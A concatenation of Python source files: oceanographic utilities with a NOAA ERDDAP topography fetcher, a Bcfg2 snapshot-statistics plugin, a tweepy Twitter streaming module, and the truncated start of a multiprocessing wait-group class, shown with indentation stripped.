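# Example (sketch): a valid 3D box passes, a box with inverted latitudes does not.
# >>> is_box([-75, -45, 20, 30, 0, 1000])
# True
# >>> is_box([-75, -45, 30, 20, 0, 1000], errors="ignore")
# False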
def is_list_of_strings(lst):
return isinstance(lst, list) and all(isinstance(elem, str) for elem in lst)
def is_list_of_dicts(lst):
return all(isinstance(x, dict) for x in lst)
def is_list_of_datasets(lst):
return all(isinstance(x, xr.Dataset) for x in lst)
def is_list_equal(lst1, lst2):
""" Return true if 2 lists contain same elements"""
return len(lst1) == len(lst2) and len(lst1) == sum([1 for i, j in zip(lst1, lst2) if i == j])
def check_wmo(lst):
""" Validate a WMO option and returned it as a list of integers
Parameters
----------
wmo: int
WMO must be an integer or an iterable with elements that can be casted as integers
errors: 'raise'
Returns
-------
list(int)
"""
is_wmo(lst, errors="raise")
# Make sure we deal with a list
if not isinstance(lst, list):
if isinstance(lst, np.ndarray):
lst = list(lst)
else:
lst = [lst]
# Then cast list elements as integers
return [abs(int(x)) for x in lst]
def is_wmo(lst, errors="raise"): # noqa: C901
""" Check if a WMO is valid
Parameters
----------
wmo: int, list(int), array(int)
WMO must be a single or a list of 5/7 digit positive numbers
errors: 'raise'
Possibly raises a ValueError exception, otherwise fails silently.
Returns
-------
bool
True if wmo is indeed a list of integers
"""
# Make sure we deal with a list
if not isinstance(lst, list):
if isinstance(lst, np.ndarray):
lst = list(lst)
else:
lst = [lst]
# Error message:
# msg = "WMO must be an integer or an iterable with elements that can be casted as integers"
msg = "WMO must be a single or a list of 5/7 digit positive numbers"
# Then try to cast list elements as integers, return True if ok
result = True
try:
for x in lst:
if not str(x).isdigit():
result = False
if (len(str(x)) != 5) and (len(str(x)) != 7):
result = False
if int(x) <= 0:
result = False
except Exception:
result = False
if errors == "raise":
raise ValueError(msg)
if not result and errors == "raise":
raise ValueError(msg)
else:
return result
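# Example (sketch): WMOs can be given as scalars, strings or arrays and are normalised
# to a list of integers; the numbers below are placeholders.
# >>> check_wmo(6901929)
# [6901929]
# >>> check_wmo(np.array([6901929, 6901930]))
# [6901929, 6901930]
# >>> is_wmo(123456, errors="ignore")  # 6 digits, hence invalid
# False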
# def docstring(value):
# """Replace one function docstring
#
# To be used as a decorator
# """
# def _doc(func):
# func.__doc__ = value
# return func
# return _doc
def warnUnless(ok, txt):
""" Decorator to raise warning unless condition is True
This function must be used as a decorator
Parameters
----------
ok: bool
Condition to raise the warning or not
txt: str
Text to display in the warning
"""
def inner(fct):
def wrapper(*args, **kwargs):
warnings.warn("%s %s" % (fct.__name__, txt))
return fct(*args, **kwargs)
return wrapper
if not ok:
return inner
else:
return lambda f: f
@contextlib.contextmanager
def modified_environ(*remove, **update):
"""
Temporarily updates the ``os.environ`` dictionary in-place.
The ``os.environ`` dictionary is updated in-place so that the modification
is sure to work in all situations.
:param remove: Environment variables to remove.
:param update: Dictionary of environment variables and values to add/update.
"""
# Source: https://github.com/laurent-laporte-pro/stackoverflow-q2059482
env = os.environ
update = update or {}
remove = remove or []
# List of environment variables being updated or removed.
stomped = (set(update.keys()) | set(remove)) & set(env.keys())
# Environment variables and values to restore on exit.
update_after = {k: env[k] for k in stomped}
# Environment variables and values to remove on exit.
remove_after = frozenset(k for k in update if k not in env)
try:
env.update(update)
[env.pop(k, None) for k in remove]
yield
finally:
env.update(update_after)
[env.pop(k) for k in remove_after]
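# Example (sketch): temporarily remove LC_ALL and override LANG inside a block;
# both are restored to their previous state on exit.
# >>> with modified_environ('LC_ALL', LANG='C'):
# ...     pass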
def toYearFraction(this_date: pd._libs.tslibs.timestamps.Timestamp = pd.to_datetime('now', utc=True)):
""" Compute decimal year, robust to leap years, precision to the second
Compute the fraction of the year a given timestamp corresponds to.
The "fraction of the year" goes:
- from 0 on 01-01T00:00:00.000 of the year
- to 1 on the 01-01T00:00:00.000 of the following year
    One second corresponds to 1 / (number of days in the year * 86400) of the year fraction.
    The fraction of the year is rounded to 10 digits in order to keep a "second" precision.
See discussion here: https://github.com/euroargodev/argodmqc_owc/issues/35
Parameters
----------
    this_date: pd._libs.tslibs.timestamps.Timestamp
Returns
-------
float
"""
if "UTC" in [this_date.tzname() if not this_date.tzinfo is None else ""]:
startOfThisYear = pd.to_datetime("%i-01-01T00:00:00.000" % this_date.year, utc=True)
else:
startOfThisYear = pd.to_datetime("%i-01-01T00:00:00.000" % this_date.year)
yearDuration_sec = (startOfThisYear + pd.offsets.DateOffset(years=1) - startOfThisYear).total_seconds()
yearElapsed_sec = (this_date - startOfThisYear).total_seconds()
fraction = yearElapsed_sec / yearDuration_sec
fraction = np.round(fraction, 10)
return this_date.year + fraction
def YearFraction_to_datetime(yf: float):
""" Compute datetime from year fraction
Inverse the toYearFraction() function
Parameters
----------
    yf: float
Returns
-------
pd._libs.tslibs.timestamps.Timestamp
"""
year = np.int32(yf)
fraction = yf - year
fraction = np.round(fraction, 10)
startOfThisYear = pd.to_datetime("%i-01-01T00:00:00" % year)
yearDuration_sec = (startOfThisYear + pd.offsets.DateOffset(years=1) - startOfThisYear).total_seconds()
yearElapsed_sec = pd.Timedelta(fraction * yearDuration_sec, unit='s')
return pd.to_datetime(startOfThisYear + yearElapsed_sec, unit='s')
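# Example (sketch): the two conversions are inverses of each other. 2020 is a leap
# year, so 2020-07-01 falls 182/366 of the way through the year:
# >>> toYearFraction(pd.to_datetime('2020-07-01', utc=True))
# 2020.4972677596
# >>> YearFraction_to_datetime(2020.4972677596)  # back to ~2020-07-01 (to the second)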
def wrap_longitude(grid_long):
""" Allows longitude (0-360) to wrap beyond the 360 mark, for mapping purposes.
Makes sure that, if the longitude is near the boundary (0 or 360) that we
wrap the values beyond
360 so it appears nicely on a map
This is a refactor between get_region_data and get_region_hist_locations to
avoid duplicate code
source: https://github.com/euroargodev/argodmqc_owc/blob/e174f4538fdae1534c9740491398972b1ffec3ca/pyowc/utilities.py#L80
Parameters
----------
grid_long: array of longitude values
Returns
-------
array of longitude values that can extend past 360
"""
neg_long = np.argwhere(grid_long < 0)
grid_long[neg_long] = grid_long[neg_long] + 360
# if we have data close to upper boundary (360), then wrap some of the data round
# so it appears on the map
top_long = np.argwhere(grid_long >= 320)
if top_long.__len__() != 0:
bottom_long = np.argwhere(grid_long <= 40)
grid_long[bottom_long] = 360 + grid_long[bottom_long]
return grid_long
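# Example (sketch): negative longitudes are folded into [0, 360] and, because values
# near 360 are present, values near 0 are wrapped past 360 (note: modifies the array in place).
# >>> wrap_longitude(np.array([-5., 10., 350.]))
# array([355., 370., 350.])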
def wmo2box(wmo_id: int):
""" Convert WMO square box number into a latitude/longitude box
See:
https://en.wikipedia.org/wiki/World_Meteorological_Organization_squares
https://commons.wikimedia.org/wiki/File:WMO-squares-global.gif
Parameters
----------
wmo_id: int
WMO square number, must be between 1000 and 7817
Returns
-------
box: list(int)
[lon_min, lon_max, lat_min, lat_max] bounds to the WMO square number
"""
if wmo_id < 1000 or wmo_id > 7817:
raise ValueError("Invalid WMO square number, must be between 1000 and 7817.")
wmo_id = str(wmo_id)
# "global quadrant" numbers where 1=NE, 3=SE, 5=SW, 7=NW
quadrant = int(wmo_id[0])
    if quadrant not in [1, 3, 5, 7]:
raise ValueError("Invalid WMO square number, 1st digit must be 1, 3, 5 or 7.")
# 'minimum' Latitude square boundary, nearest to the Equator
nearest_to_the_Equator_latitude = int(wmo_id[1])
# 'minimum' Longitude square boundary, nearest to the Prime Meridian
nearest_to_the_Prime_Meridian = int(wmo_id[2:4])
#
dd = 10
if quadrant in [1, 3]:
lon_min = nearest_to_the_Prime_Meridian*dd
lon_max = nearest_to_the_Prime_Meridian*dd+dd
elif quadrant in [5, 7]:
lon_min = -nearest_to_the_Prime_Meridian*dd-dd
lon_max = -nearest_to_the_Prime_Meridian*dd
if quadrant in [1, 7]:
lat_min = nearest_to_the_Equator_latitude*dd
lat_max = nearest_to_the_Equator_latitude*dd+dd
elif quadrant in [3, 5]:
lat_min = -nearest_to_the_Equator_latitude*dd-dd
lat_max = -nearest_to_the_Equator_latitude*dd
box = [lon_min, lon_max, lat_min, lat_max]
return box
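# Example (sketch): WMO square 3201 lies in the south-east quadrant.
# >>> wmo2box(3201)
# [10, 20, -30, -20]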
def groupby_remap(z, data, z_regridded, z_dim=None, z_regridded_dim="regridded", output_dim="remapped", select='deep', right=False):
""" todo: Need a docstring here !"""
# sub-sampling called in xarray ufunc
def _subsample_bins(x, y, target_values):
# remove all nans from input x and y
idx = np.logical_or(np.isnan(x), np.isnan(y))
x = x[~idx]
y = y[~idx]
ifound = np.digitize(x, target_values, right=right) # ``bins[i-1] <= x < bins[i]``
ifound -= 1 # Because digitize returns a 1-based indexing, we need to remove 1
y_binned = np.ones_like(target_values) * np.nan
for ib, this_ibin in enumerate(np.unique(ifound)):
ix = np.where(ifound == this_ibin)
iselect = ix[-1]
# Map to y value at specific x index in the bin:
if select == 'shallow':
iselect = iselect[0] # min/shallow
mapped_value = y[iselect]
elif select == 'deep':
iselect = iselect[-1] # max/deep
mapped_value = y[iselect]
elif select == 'middle':
iselect = iselect[np.where(x[iselect] >= np.median(x[iselect]))[0][0]] # median/middle
mapped_value = y[iselect]
elif select == 'random':
iselect = iselect[np.random.randint(len(iselect))]
mapped_value = y[iselect]
# or Map to y statistics in the bin:
elif select == 'mean':
mapped_value = np.nanmean(y[iselect])
elif select == 'min':
mapped_value = np.nanmin(y[iselect])
elif select == 'max':
mapped_value = np.nanmax(y[iselect])
elif select == 'median':
mapped_value = np.median(y[iselect])
else:
raise InvalidOption("`select` option has invalid value (%s)" % select)
y_binned[this_ibin] = mapped_value
return y_binned
# infer dim from input
if z_dim is None:
if len(z.dims) != 1:
raise RuntimeError("if z_dim is not specified, x must be a 1D array.")
dim = z.dims[0]
else:
dim = z_dim
# if dataset is passed drop all data_vars that dont contain dim
if isinstance(data, xr.Dataset):
raise ValueError("Dataset input is not supported yet")
# TODO: for a dataset input just apply the function for each appropriate array
if version.parse(xr.__version__) > version.parse("0.15.0"):
kwargs = dict(
input_core_dims=[[dim], [dim], [z_regridded_dim]],
output_core_dims=[[output_dim]],
vectorize=True,
dask="parallelized",
output_dtypes=[data.dtype],
dask_gufunc_kwargs={'output_sizes': {output_dim: len(z_regridded[z_regridded_dim])}},
)
else:
kwargs = dict(
input_core_dims=[[dim], [dim], [z_regridded_dim]],
output_core_dims=[[output_dim]],
vectorize=True,
dask="parallelized",
output_dtypes=[data.dtype],
output_sizes={output_dim: len(z_regridded[z_regridded_dim])},
)
remapped = xr.apply_ufunc(_subsample_bins, z, data, z_regridded, **kwargs)
remapped.coords[output_dim] = z_regridded.rename({z_regridded_dim: output_dim}).coords[output_dim]
return remapped
class TopoFetcher():
""" Fetch topographic data through an ERDDAP server for an ocean rectangle
Example:
>>> from argopy import TopoFetcher
>>> box = [-75, -45, 20, 30] # Lon_min, lon_max, lat_min, lat_max
>>> ds = TopoFetcher(box).to_xarray()
>>> ds = TopoFetcher(box, ds='gebco', stride=[10, 10], cache=True).to_xarray()
"""
class ERDDAP():
def __init__(self, server: str, protocol: str = 'tabledap'):
self.server = server
self.protocol = protocol
self.response = 'nc'
self.dataset_id = ''
self.constraints = ''
def __init__(
self,
box: list,
ds: str = "gebco",
cache: bool = False,
cachedir: str = "",
api_timeout: int = 0,
stride: list = [1, 1],
**kwargs,
):
""" Instantiate an ERDDAP topo data fetcher
Parameters
----------
ds: str (optional), default: 'gebco'
Dataset to load:
- 'gebco' will load the GEBCO_2020 Grid, a continuous terrain model for oceans and land at 15 arc-second intervals
stride: list, default [1, 1]
Strides along longitude and latitude. This allows changing the output resolution.
cache: bool (optional)
Cache data or not (default: False)
cachedir: str (optional)
Path to cache folder
api_timeout: int (optional)
ERDDAP request timeout in seconds. Set to OPTIONS['api_timeout'] by default.
"""
timeout = OPTIONS["api_timeout"] if api_timeout == 0 else api_timeout
self.fs = httpstore(cache=cache, cachedir=cachedir, timeout=timeout, size_policy='head')
self.definition = "Erddap topographic data fetcher"
self.BOX = box
self.stride = stride
if ds == "gebco":
self.definition = "NOAA erddap gebco data fetcher for a space region"
self.server = 'https://coastwatch.pfeg.noaa.gov/erddap'
self.server_name = 'NOAA'
self.dataset_id = 'gebco'
self._init_erddap()
def _init_erddap(self):
# Init erddap
self.erddap = self.ERDDAP(server=self.server, protocol="griddap")
self.erddap.response = "nc"
if self.dataset_id == "gebco":
self.erddap.dataset_id = "GEBCO_2020"
else:
raise ValueError(
"Invalid database short name for %s erddap" % self.server_name
)
return self
def _cname(self) -> str:
""" Fetcher one line string definition helper """
cname = "?"
if hasattr(self, "BOX"):
BOX = self.BOX
cname = ("[x=%0.2f/%0.2f; y=%0.2f/%0.2f]") % (
BOX[0],
BOX[1],
BOX[2],
BOX[3],
)
return cname
def __repr__(self):
summary = ["<topofetcher.erddap>"]
summary.append("Name: %s" % self.definition)
summary.append("API: %s" % self.server)
summary.append("Domain: %s" % format_oneline(self.cname()))
return "\n".join(summary)
def cname(self):
""" Return a unique string defining the constraints """
return self._cname()
@property
def cachepath(self):
""" Return path to cached file(s) for this request
Returns
-------
list(str)
"""
return [self.fs.cachepath(uri) for uri in self.uri]
def define_constraints(self):
""" Define request constraints """
# Eg: https://coastwatch.pfeg.noaa.gov/erddap/griddap/GEBCO_2020.nc?elevation%5B(34):5:(42)%5D%5B(-21):7:(-12)%5D
self.erddap.constraints = "%s(%0.2f):%i:(%0.2f)%s%s(%0.2f):%i:(%0.2f)%s" % (
"%5B", self.BOX[2], self.stride[1], self.BOX[3], "%5D",
"%5B", self.BOX[0], self.stride[0], self.BOX[1], "%5D")
return None
# @property
# def _minimal_vlist(self):
# """ Return the minimal list of variables to retrieve """
# vlist = list()
# vlist.append("latitude")
# vlist.append("longitude")
# vlist.append("elevation")
# return vlist
def get_url(self):
""" Return the URL to download data requested
Returns
-------
str
"""
# First part of the URL:
protocol = self.erddap.protocol
dataset_id = self.erddap.dataset_id
response = self.erddap.response
url = f"{self.erddap.server}/{protocol}/{dataset_id}.{response}?"
# Add variables to retrieve:
variables = ["elevation"]
variables = ",".join(variables)
url += f"{variables}"
# Add constraints:
self.define_constraints() # Define constraint to select this box of data (affect self.erddap.constraints)
url += f"{self.erddap.constraints}"
return url
@property
def uri(self):
""" List of files to load for a request
Returns
-------
list(str)
"""
return [self.get_url()]
def to_xarray(self, errors: str = 'ignore'):
""" Load Topographic data and return a xarray.DataSet """
# Download data
if len(self.uri) == 1:
ds = self.fs.open_dataset(self.uri[0])
return ds
def load(self, errors: str = 'ignore'):
""" Load Topographic data and return a xarray.DataSet """
return self.to_xarray(errors=errors)
|
Snapshots.py
|
import logging
import difflib
import Bcfg2.Server.Plugin
import Bcfg2.Server.Snapshots
import Bcfg2.Logger
from Bcfg2.Server.Snapshots.model import Snapshot
import sys
import time
import threading
# Compatibility import
from Bcfg2.Bcfg2Py3k import Queue, u_str, b64decode
logger = logging.getLogger('Snapshots')
ftypes = ['ConfigFile', 'SymLink', 'Directory']
datafields = {
'Package': ['version'],
'Path': ['type'],
'Service': ['status'],
'ConfigFile': ['owner', 'group', 'perms'],
'Directory': ['owner', 'group', 'perms'],
'SymLink': ['to'],
}
def build_snap_ent(entry):
basefields = []
if entry.tag in ['Package', 'Service']:
basefields += ['type']
desired = dict([(key, u_str(entry.get(key))) for key in basefields])
state = dict([(key, u_str(entry.get(key))) for key in basefields])
desired.update([(key, u_str(entry.get(key))) for key in \
datafields[entry.tag]])
if entry.tag == 'ConfigFile' or \
((entry.tag == 'Path') and (entry.get('type') == 'file')):
if entry.text is None:
desired['contents'] = None
else:
if entry.get('encoding', 'ascii') == 'ascii':
desired['contents'] = u_str(entry.text)
else:
desired['contents'] = u_str(b64decode(entry.text))
if 'current_bfile' in entry.attrib:
state['contents'] = u_str(b64decode(entry.get('current_bfile')))
elif 'current_bdiff' in entry.attrib:
diff = b64decode(entry.get('current_bdiff'))
state['contents'] = u_str( \
'\n'.join(difflib.restore(diff.split('\n'), 1)))
state.update([(key, u_str(entry.get('current_' + key, entry.get(key)))) \
for key in datafields[entry.tag]])
if entry.tag in ['ConfigFile', 'Path'] and entry.get('exists', 'true') == 'false':
state = None
return [desired, state]
class Snapshots(Bcfg2.Server.Plugin.Statistics):
name = 'Snapshots'
experimental = True
def __init__(self, core, datastore):
Bcfg2.Server.Plugin.Statistics.__init__(self, core, datastore)
self.session = Bcfg2.Server.Snapshots.setup_session(core.cfile)
self.work_queue = Queue()
self.loader = threading.Thread(target=self.load_snapshot)
self.loader.start()
def load_snapshot(self):
while self.running:
try:
(metadata, data) = self.work_queue.get(block=True, timeout=5)
except:
continue
self.statistics_from_old_stats(metadata, data)
def process_statistics(self, metadata, data):
return self.work_queue.put((metadata, data))
def statistics_from_old_stats(self, metadata, xdata):
# entries are name -> (modified, correct, start, desired, end)
# not sure we can get all of this from old format stats
t1 = time.time()
entries = dict([('Package', dict()),
('Service', dict()), ('Path', dict())])
extra = dict([('Package', dict()), ('Service', dict()),
('Path', dict())])
bad = []
state = xdata.find('.//Statistics')
correct = state.get('state') == 'clean'
revision = u_str(state.get('revision', '-1'))
for entry in state.find('.//Bad'):
data = [False, False, u_str(entry.get('name'))] \
+ build_snap_ent(entry)
if entry.tag in ftypes:
etag = 'Path'
else:
etag = entry.tag
entries[etag][entry.get('name')] = data
for entry in state.find('.//Modified'):
if entry.tag in ftypes:
etag = 'Path'
else:
etag = entry.tag
if entry.get('name') in entries[etag]:
data = [True, False, u_str(entry.get('name'))] + \
build_snap_ent(entry)
else:
data = [True, False, u_str(entry.get('name'))] + \
build_snap_ent(entry)
for entry in state.find('.//Extra'):
if entry.tag in datafields:
data = build_snap_ent(entry)[1]
ename = u_str(entry.get('name'))
data['name'] = ename
extra[entry.tag][ename] = data
else:
print("extra", entry.tag, entry.get('name'))
t2 = time.time()
snap = Snapshot.from_data(self.session, correct, revision,
metadata, entries, extra)
self.session.add(snap)
self.session.commit()
t3 = time.time()
logger.info("Snapshot storage took %fs" % (t3 - t2))
return True
|
my_tweepy.py
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
# Appengine users: https://developers.google.com/appengine/docs/python/sockets/#making_httplib_use_sockets
from __future__ import absolute_import, print_function
import logging
import re
import requests
import sys
from requests.exceptions import Timeout
from threading import Thread
from time import sleep
import six
import ssl
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson
json = import_simplejson()
STREAM_VERSION = '1.1'
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_connect(self):
"""Called once connected to streaming server.
This will be invoked once a successful response
is received from the server. Allows the listener
to perform some work prior to entering the read loop.
"""
pass
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
data = json.loads(raw_data)
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, data)
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = data['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'event' in data:
status = Status.parse(self.api, data)
if self.on_event(status) is False:
return False
elif 'direct_message' in data:
status = Status.parse(self.api, data)
if self.on_direct_message(status) is False:
return False
elif 'friends' in data:
if self.on_friends(data['friends']) is False:
return False
elif 'limit' in data:
if self.on_limit(data['limit']['track']) is False:
return False
elif 'disconnect' in data:
if self.on_disconnect(data['disconnect']) is False:
return False
elif 'warning' in data:
if self.on_warning(data['warning']) is False:
return False
else:
logging.error("Unknown message type: " + str(raw_data))
def keep_alive(self):
"""Called when a keep-alive arrived"""
return
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_exception(self, exception):
"""Called when an unhandled exception occurs."""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_event(self, status):
"""Called when a new event arrives"""
return
def on_direct_message(self, status):
"""Called when a new direct message arrives"""
return
def on_friends(self, friends):
"""Called when a friends list arrives.
friends is a list that contains user_id
"""
return
def on_limit(self, track):
"""Called when a limitation notice arrives"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
def on_disconnect(self, notice):
"""Called when twitter sends a disconnect notice
Disconnect codes are listed here:
https://dev.twitter.com/docs/streaming-apis/messages#Disconnect_messages_disconnect
"""
return
def on_warning(self, notice):
"""Called when a disconnection warning message arrives"""
return
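# A minimal sketch (comment only, so the module stays import-safe) of how StreamListener
# is typically subclassed. `MyListener` and the printed field are illustrative assumptions;
# the hooks overridden here are the ones defined on StreamListener above.
#
#   class MyListener(StreamListener):
#       def on_status(self, status):
#           # every parsed tweet lands here; returning False stops the stream
#           print(status.text)
#
#       def on_error(self, status_code):
#           # returning False on HTTP 420 stops the stream instead of backing off
#           return status_code != 420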
class ReadBuffer(object):
"""Buffer data from the response in a smarter way than httplib/requests can.
Tweets are roughly in the 2-12kb range, averaging around 3kb.
Requests/urllib3/httplib/socket all use socket.read, which blocks
until enough data is returned. On some systems (eg google appengine), socket
reads are quite slow. To combat this latency we can read big chunks,
but the blocking part means we won't get results until enough tweets
have arrived. That may not be a big deal for high throughput systems.
For low throughput systems we don't want to sacrifice latency, so we
use small chunks so it can read the length and the tweet in 2 read calls.
"""
def __init__(self, stream, chunk_size, encoding='utf-8'):
self._stream = stream
self._buffer = six.b('')
self._chunk_size = chunk_size
self._encoding = encoding
def read_len(self, length):
while not self._stream.closed:
if len(self._buffer) >= length:
return self._pop(length)
read_len = max(self._chunk_size, length - len(self._buffer))
self._buffer += self._stream.read(read_len)
return six.b('')
def read_line(self, sep=six.b('\n')):
"""Read the data stream until a given separator is found (default \n)
:param sep: Separator to read until. Must be of the bytes type (str in python 2,
bytes in python 3)
:return: The str of the data read until sep
"""
start = 0
while not self._stream.closed:
loc = self._buffer.find(sep, start)
if loc >= 0:
return self._pop(loc + len(sep))
else:
start = len(self._buffer)
self._buffer += self._stream.read(self._chunk_size)
return six.b('')
def _pop(self, length):
r = self._buffer[:length]
self._buffer = self._buffer[length:]
return r.decode(self._encoding)
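# Comment-only sketch of the length-delimited framing ReadBuffer expects: a line holding
# the payload length, then that many bytes. io.BytesIO stands in for the HTTP response
# body and is an assumption for illustration; the two calls are the methods defined above.
#
#   import io
#   raw = io.BytesIO(b'11\n{"id": 42}\n')
#   buf = ReadBuffer(raw, chunk_size=4)
#   length = int(buf.read_line())   # -> 11
#   payload = buf.read_len(length)  # -> '{"id": 42}\n'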
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
# values according to
# https://dev.twitter.com/docs/streaming-apis/connecting#Reconnecting
self.retry_time_start = options.get("retry_time", 5.0)
self.retry_420_start = options.get("retry_420", 60.0)
self.retry_time_cap = options.get("retry_time_cap", 320.0)
self.snooze_time_step = options.get("snooze_time", 0.25)
self.snooze_time_cap = options.get("snooze_time_cap", 16)
# The default socket.read size. Default to less than half the size of
# a tweet so that it reads tweets with the minimal latency of 2 reads
# per tweet. Values higher than ~1kb will increase latency by waiting
# for more data to arrive but may also increase throughput by doing
# fewer socket read calls.
self.chunk_size = options.get("chunk_size", 512)
self.verify = options.get("verify", True)
self.api = API()
self.headers = options.get("headers") or {}
self.new_session()
self.body = None
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
def new_session(self):
self.session = requests.Session()
self.session.headers = self.headers
self.session.params = None
def _run(self):
# Authenticate
url = "https://%s%s" % (self.host, self.url)
# Connect and process the stream
error_counter = 0
resp = None
exc_info = None
while self.running:
if self.retry_count is not None:
if error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
auth = self.auth.apply_auth()
resp = self.session.request('POST',
url,
data=self.body,
timeout=self.timeout,
stream=True,
auth=auth,
verify=self.verify)
if resp.status_code != 200:
if self.listener.on_error(resp.status_code) is False:
break
error_counter += 1
if resp.status_code == 420:
self.retry_time = max(self.retry_420_start,
self.retry_time)
sleep(self.retry_time)
self.retry_time = min(self.retry_time * 2,
self.retry_time_cap)
else:
error_counter = 0
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
self.listener.on_connect()
self._read_loop(resp)
except (Timeout, ssl.SSLError) as exc:
# This is still necessary, as an SSLError can actually be
# thrown when using Requests.
# If it's not a timeout, treat it like any other exception.
if isinstance(exc, ssl.SSLError):
if not (exc.args and 'timed out' in str(exc.args[0])):
exc_info = sys.exc_info()
break
if self.listener.on_timeout() is False:
break
if self.running is False:
break
sleep(self.snooze_time)
self.snooze_time = min(self.snooze_time + self.snooze_time_step,
self.snooze_time_cap)
except Exception as exc:
exc_info = sys.exc_info()
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if resp:
resp.close()
self.new_session()
if exc_info:
# call a handler first so that the exception can be logged.
self.listener.on_exception(exc_info[1])
six.reraise(*exc_info)
def _data(self, data):
if self.listener.on_data(data) is False:
self.running = False
def _read_loop(self, resp):
charset = resp.headers.get('content-type', default='')
enc_search = re.search(r'charset=(?P<enc>\S*)', charset)
if enc_search is not None:
encoding = enc_search.group('enc')
else:
encoding = 'utf-8'
buf = ReadBuffer(resp.raw, self.chunk_size, encoding=encoding)
while self.running and not resp.raw.closed:
length = 0
while self.running and not resp.raw.closed:
line = buf.read_line()
if not line:
# keep-alive new lines are expected
if self.listener.keep_alive() is False:
self.running = False
elif line.strip().isdigit():
length = int(line)
break
else:
raise TweepError('Expecting length, unexpected value found')
next_status_obj = buf.read_len(length)
if self.running and next_status_obj:
self._data(next_status_obj)
# # Note: keep-alive newlines might be inserted before each length value.
# # read until we get a digit...
# c = b'\n'
# for c in resp.iter_content(decode_unicode=True):
# if c == b'\n':
# continue
# break
#
# delimited_string = c
#
# # read rest of delimiter length..
# d = b''
# for d in resp.iter_content(decode_unicode=True):
# if d != b'\n':
# delimited_string += d
# continue
# break
#
# # read the next twitter status object
# if delimited_string.decode('utf-8').strip().isdigit():
# status_id = int(delimited_string)
# next_status_obj = resp.raw.read(status_id)
# if self.running:
# self._data(next_status_obj.decode('utf-8'))
if resp.raw.closed:
self.on_closed(resp)
def _start(self, async_):  # 'async' is a reserved word in Python 3, hence the trailing underscore
self.running = True
if async_:
self._thread = Thread(target=self._run)
self._thread.start()
else:
self._run()
def on_closed(self, resp):
""" Called when the response has been closed by Twitter """
pass
def userstream(self,
stall_warnings=False,
_with=None,
replies=None,
track=None,
locations=None,
async_=False,
encoding='utf8'):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/user.json' % STREAM_VERSION
self.host = 'userstream.twitter.com'
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if _with:
self.session.params['with'] = _with
if replies:
self.session.params['replies'] = replies
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.2f' % l for l in locations])
if track:
self.session.params['track'] = u','.join(track).encode(encoding)
self._start(async_)
def firehose(self, count=None, async_=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/firehose.json' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async_)
def retweet(self, async_=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/retweet.json' % STREAM_VERSION
self._start(async_)
def sample(self, async_=False, languages=None, stall_warnings=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/sample.json' % STREAM_VERSION
if languages:
self.session.params['language'] = ','.join(map(str, languages))
if stall_warnings:
self.session.params['stall_warnings'] = 'true'
self._start(async_)
def filter(self, follow=None, track=None, async_=False, locations=None,
stall_warnings=False, languages=None, encoding='utf8', filter_level=None):
self.body = {}
self.session.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/filter.json' % STREAM_VERSION
if follow:
self.body['follow'] = u','.join(follow).encode(encoding)
if track:
self.body['track'] = u','.join(track).encode(encoding)
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.body['locations'] = u','.join(['%.4f' % l for l in locations])
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if languages:
self.body['language'] = u','.join(map(str, languages))
if filter_level:
self.body['filter_level'] = filter_level.encode(encoding)
self.session.params = {'delimited': 'length'}
self.host = 'stream.twitter.com'
self._start(async_)
def sitestream(self, follow, stall_warnings=False,
with_='user', replies=False, async_=False):
self.body = {}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/site.json' % STREAM_VERSION
self.body['follow'] = u','.join(map(six.text_type, follow))
self.body['delimited'] = 'length'
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if with_:
self.body['with'] = with_
if replies:
self.body['replies'] = replies
self._start(async_)
def disconnect(self):
if self.running is False:
return
self.running = False
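# Illustrative wiring of the classes above, kept as a comment. The OAuth handler and the
# track keyword are assumptions for the sketch; in practice a StreamListener subclass
# would normally be passed instead of the bare base class.
#
#   auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
#   auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
#   stream = Stream(auth, StreamListener(),
#                   retry_count=3,    # give up after 3 consecutive errors
#                   chunk_size=512)   # small reads keep per-tweet latency low
#   stream.filter(track=['python'], async_=True)  # read loop runs in a background thread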
|
wait_group_process.py
|
from multiprocessing import Condition, Value, Process
import time
# note this is the equivalent of a waitgroup for a process instead of a thread
class WaitGroupProcess:
def __init__(self, cv, wait_count):
self.cv = cv
self.wait_count = wait_count
def add(self, count):
